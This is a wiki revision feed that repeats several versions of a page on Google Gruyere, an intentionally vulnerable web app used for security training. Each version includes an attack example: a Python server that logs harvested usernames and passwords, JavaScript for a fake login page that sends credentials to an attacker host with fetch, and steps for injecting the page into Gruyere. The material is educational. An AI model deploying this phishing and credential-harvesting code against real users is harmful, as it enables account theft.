              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
[[File:injection.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Injection.png&amp;diff=17637</id>
		<title>File:Injection.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Injection.png&amp;diff=17637"/>
		<updated>2024-12-18T19:46:31Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17635</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17635"/>
		<updated>2024-12-18T19:45:28Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17631</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17631"/>
		<updated>2024-12-18T19:37:54Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17617</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17617"/>
		<updated>2024-12-18T19:29:12Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
